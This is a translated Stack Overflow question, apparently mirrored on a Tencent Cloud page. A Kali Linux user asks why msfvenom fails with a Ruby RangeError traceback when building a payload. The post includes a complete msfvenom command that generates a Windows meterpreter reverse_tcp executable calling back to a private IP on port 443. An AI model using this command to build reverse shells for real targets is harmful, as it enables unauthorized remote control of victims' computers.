首页
学习
活动
专区
工具
TVP
发布
社区首页 >问答首页 >Kali Linux - MSFVenom有效负载创建错误

Kali Linux - MSFVenom有效负载创建错误
EN

Stack Overflow用户
提问于 2018-04-10 10:09:53
回答 3查看 2.2K关注 0票数 -2

因此,我刚刚在我的Dell Inspiron 5000系列英特尔酷睿I5 (第8代)上安装了Kali Linux Rolling!当我试图在MSFVenom中创建一个Windows有效负载时,我遇到了一个错误。这是我输入的内容:

代码语言:javascript
复制
root@GetOffMyLawnBish:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.100 LPORT=443 -f exe > Desktop/localpayload.exe

这是我得到的结果:

代码语言:javascript
复制
/usr/share/metasploit-framework/lib/msf/core/payload/android.rb:92:in `not_after=': bignum too big to convert into `long' (RangeError)
from /usr/share/metasploit-framework/lib/msf/core/payload/android.rb:92:in `sign_jar'
from /usr/share/metasploit-framework/lib/msf/core/payload/android.rb:123:in `generate_jar'
from /usr/share/metasploit-framework/modules/payloads/singles/android/meterpreter_reverse_http.rb:50:in `generate_jar'
from /usr/share/metasploit-framework/lib/msf/core/payload/android.rb:38:in `generate'
from /usr/share/metasploit-framework/lib/msf/core/payload.rb:204:in `size'
from /usr/share/metasploit-framework/lib/msf/core/payload_set.rb:91:in `block in recalculate'
from /usr/share/metasploit-framework/lib/msf/core/payload_set.rb:78:in `each_pair'
from /usr/share/metasploit-framework/lib/msf/core/payload_set.rb:78:in `recalculate'
from /usr/share/metasploit-framework/lib/msf/core/modules/loader/base.rb:251:in `block in load_modules'
from /usr/share/metasploit-framework/lib/msf/core/modules/loader/base.rb:248:in `each'
from /usr/share/metasploit-framework/lib/msf/core/modules/loader/base.rb:248:in `load_modules'
from /usr/share/metasploit-framework/lib/msf/core/module_manager/loading.rb:119:in `block in load_modules'
from /usr/share/metasploit-framework/lib/msf/core/module_manager/loading.rb:117:in `each'
from /usr/share/metasploit-framework/lib/msf/core/module_manager/loading.rb:117:in `load_modules'
from /usr/share/metasploit-framework/lib/msf/core/module_manager/module_paths.rb:41:in `block in add_module_path'
from /usr/share/metasploit-framework/lib/msf/core/module_manager/module_paths.rb:40:in `each'
from /usr/share/metasploit-framework/lib/msf/core/module_manager/module_paths.rb:40:in `add_module_path'
from /usr/share/metasploit-framework/lib/msf/base/simple/framework/module_paths.rb:50:in `block in init_module_paths'
from /usr/share/metasploit-framework/lib/msf/base/simple/framework/module_paths.rb:49:in `each'
from /usr/share/metasploit-framework/lib/msf/base/simple/framework/module_paths.rb:49:in `init_module_paths'
from /usr/share/metasploit-framework/lib/msf/base/simple/framework.rb:121:in `simplify'
from /usr/share/metasploit-framework/lib/msf/base/simple/framework.rb:73:in `create'
from /usr/bin/msfvenom:36:in `init_framework'
from /usr/bin/msfvenom:45:in `framework'
from /usr/bin/msfvenom:327:in `<main>'

有人知道这是怎么回事吗?请让我知道!

哦,顺便说一下,我已经创建了一个公共负载,这将是我的本地负载,但奇怪的是,公共负载完成时没有任何问题,但是一旦我将IPAddress更改为我的本地负载,它就会给我一个错误:(。

EN
页面原文内容由Stack Overflow提供。腾讯云小微IT领域专用引擎提供翻译支持
原文链接:

https://stackoverflow.com/questions/49744227

复制
相关文章

相似问题

领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档